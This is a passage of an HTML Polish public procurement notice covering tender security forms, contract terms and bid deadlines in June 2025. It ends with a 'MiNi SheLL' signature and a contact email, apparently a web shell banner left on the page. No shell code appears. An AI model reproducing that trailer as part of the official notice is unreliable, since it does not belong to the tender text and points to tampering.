oszczędnościowo – kredytowej, <br/>z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, <br/>- w gwarancjach ubezpieczeniowych <br/>- w gwarancjach bankowych <br/>- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310 ze zm.) sposób przekazania: przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. <br/>4. Dokument potwierdzający wniesienie wadium należy dołączyć do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Katalog zmian zawiera zał. nr 4 do SWZ projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com